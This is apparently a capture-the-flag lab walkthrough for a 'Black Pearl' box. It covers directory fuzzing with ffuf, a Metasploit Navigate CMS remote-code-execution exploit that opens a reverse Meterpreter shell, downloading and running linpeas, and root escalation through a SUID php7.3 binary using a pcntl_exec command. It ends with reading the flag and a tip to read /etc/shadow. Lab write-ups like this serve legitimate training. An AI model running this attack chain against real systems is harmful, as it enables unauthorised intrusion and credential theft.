ffuf -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt:FUZZ -u http://blackpearl.tcm/FUZZ
/'___\ /'___\ /'___\
/\ \__/ /\ \__/ __ __ /\ \__/
\ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\
\ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/
\ \_\ \ \_\ \ \____/ \ \_\
\/_/ \/_/ \/___/ \/_/
v2.1.0-dev
________________________________________________
:: Method : GET
:: URL : http://blackpearl.tcm/FUZZ
:: Wordlist : FUZZ: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
:: Follow redirects : false
:: Calibration : false
:: Timeout : 10
:: Threads : 40
:: Matcher : Response status: 200-299,301,302,307,401,403,405,500
________________________________________________
# directory-list-2.3-medium.txt [Status: 200, Size: 86789, Words: 4212, Lines: 1040, Duration: 8ms]
# Priority ordered case sensative list, where entries were found [Status: 200, Size: 86789, Words: 4212, Lines: 1040, Duration: 13ms]
# [Status: 200, Size: 86789, Words: 4212, Lines: 1040, Duration: 16ms]
# [Status: 200, Size: 86789, Words: 4212, Lines: 1040, Duration: 23ms]
# on atleast 2 different hosts [Status: 200, Size: 86789, Words: 4212, Lines: 1040, Duration: 32ms]
# This work is licensed under the Creative Commons [Status: 200, Size: 86789, Words: 4212, Lines: 1040, Duration: 35ms]
# Copyright 2007 James Fisher [Status: 200, Size: 86789, Words: 4212, Lines: 1040, Duration: 43ms]
[Status: 200, Size: 86789, Words: 4212, Lines: 1040, Duration: 47ms]
# Suite 300, San Francisco, California, 94105, USA. [Status: 200, Size: 86790, Words: 4212, Lines: 1040, Duration: 52ms]
# or send a letter to Creative Commons, 171 Second Street, [Status: 200, Size: 86790, Words: 4212, Lines: 1040, Duration: 62ms]
# [Status: 200, Size: 86790, Words: 4212, Lines: 1040, Duration: 75ms]
# Attribution-Share Alike 3.0 License. To view a copy of this [Status: 200, Size: 86790, Words: 4212, Lines: 1040, Duration: 92ms]
# [Status: 200, Size: 86790, Words: 4212, Lines: 1040, Duration: 94ms]
# license, visit http://creativecommons.org/licenses/by-sa/3.0/ [Status: 200, Size: 86790, Words: 4212, Lines: 1040, Duration: 89ms]
navigate [Status: 301, Size: 185, Words: 6, Lines: 8, Duration: 6ms]
[Status: 200, Size: 86790, Words: 4212, Lines: 1040, Duration: 15ms]
:: Progress: [220560/220560] :: Job [1/1] :: 6060 req/sec :: Duration: [0:00:48] :: Errors: 0 ::
Notes
PHP info page, Linux blackpearl 4.19.0-16-amd64 #1 SMP Debian 4.19.181-1 (2021-03-19) x86_64, php/7.3/
/navigate login page, Navigate CMS v2.8
https://www.rapid7.com/db/modules/exploit/multi/http/navigate_cms_rce/
- run
msfconsole use exploit/multi/http/navigate_cms_rceset rhosts 192.168.92.137set vhost blackpearl.tcm- run
exploit
[*] Started reverse TCP handler on 192.168.92.128:4444
[+] Login bypass successful
[+] Upload successful
[*] Triggering payload...
[*] Sending stage (39927 bytes) to 192.168.92.137
[*] Meterpreter session 1 opened (192.168.92.128:4444 -> 192.168.92.137:50606) at 2024-07-26 08:04:04 -0400
meterpreter > shell
Process 833 created.
Channel 1 created.
whoami
www-data
which python
/usr/bin/python
- paste
python -c 'import pty; pty.spawn("/bin/bash")'in the shell sudo -lwe don't have sudo privileges
cd /tmpto create a temp folder and download linpeas- download linpeas
wget https://github.com/peass-ng/PEASS-ng/releases/latest/download/linpeas.shandchmod +x linpeas.sh - run
./linpeas.sh
╔══════════╣ SUID - Check easy privesc, exploits and write perms
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#sudo-and-suid
strings Not Found
strace Not Found
-rwsr-xr-- 1 root messagebus 50K Jul 5 2020 /usr/lib/dbus-1.0/dbus-daemon-launch-helper
-rwsr-xr-x 1 root root 10K Mar 28 2017 /usr/lib/eject/dmcrypt-get-device
-rwsr-xr-x 1 root root 427K Jan 31 2020 /usr/lib/openssh/ssh-keysign
-rwsr-xr-x 1 root root 35K Jan 10 2019 /usr/bin/umount ---> BSD/Linux(08-1996)
-rwsr-xr-x 1 root root 44K Jul 27 2018 /usr/bin/newgrp ---> HP-UX_10.20
-rwsr-xr-x 1 root root 51K Jan 10 2019 /usr/bin/mount ---> Apple_Mac_OSX(Lion)_Kernel_xnu-1699.32.7_except_xnu-1699.24.8
-rwsr-xr-x 1 root root 4.6M Feb 13 2021 /usr/bin/php7.3 (Unknown SUID binary!)
-rwsr-xr-x 1 root root 63K Jan 10 2019 /usr/bin/su
-rwsr-xr-x 1 root root 53K Jul 27 2018 /usr/bin/chfn ---> SuSE_9.3/10
-rwsr-xr-x 1 root root 63K Jul 27 2018 /usr/bin/passwd ---> Apple_Mac_OSX(03-2006)/Solaris_8/9(12-2004)/SPARC_8/9/Sun_Solaris_2.3_to_2.5.1(02-1997)
-rwsr-xr-x 1 root root 44K Jul 27 2018 /usr/bin/chsh
-rwsr-xr-x 1 root root 83K Jul 27 2018 /usr/bin/gpasswd
- suid:
rwsrmeans we can run it as the owner (root), sgid as the group - another way to get it:
find / -perm -4000 -type f 2>/dev/null
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/eject/dmcrypt-get-device
/usr/lib/openssh/ssh-keysign
/usr/bin/umount
/usr/bin/newgrp
/usr/bin/mount
/usr/bin/php7.3
/usr/bin/su
/usr/bin/chfn
/usr/bin/passwd
/usr/bin/chsh
/usr/bin/gpasswd
- go through the list with https://gtfobins.github.io/#+suid, and look for a solution
- we decide to use
/usr/bin/php7.3 -r "pcntl_exec('/bin/sh', ['-p']);"
/usr/bin/php7.3 -r "pcntl_exec('/bin/sh', ['-p']);"
</usr/bin/php7.3 -r "pcntl_exec('/bin/sh', ['-p']);"
# id
id
uid=33(www-data) gid=33(www-data) euid=0(root) groups=33(www-data)
# cd /root
cd /root
# ls
ls
flag.txt
# cat flag.txt
cat flag.txt
Good job on this one.
Finding the domain name may have been a little guessy,
but the goal of this box is mainly to teach about Virtual Host Routing which is used in a lot of CTF.
- you can also do
cat/etc/shadowandcat/etc/passwd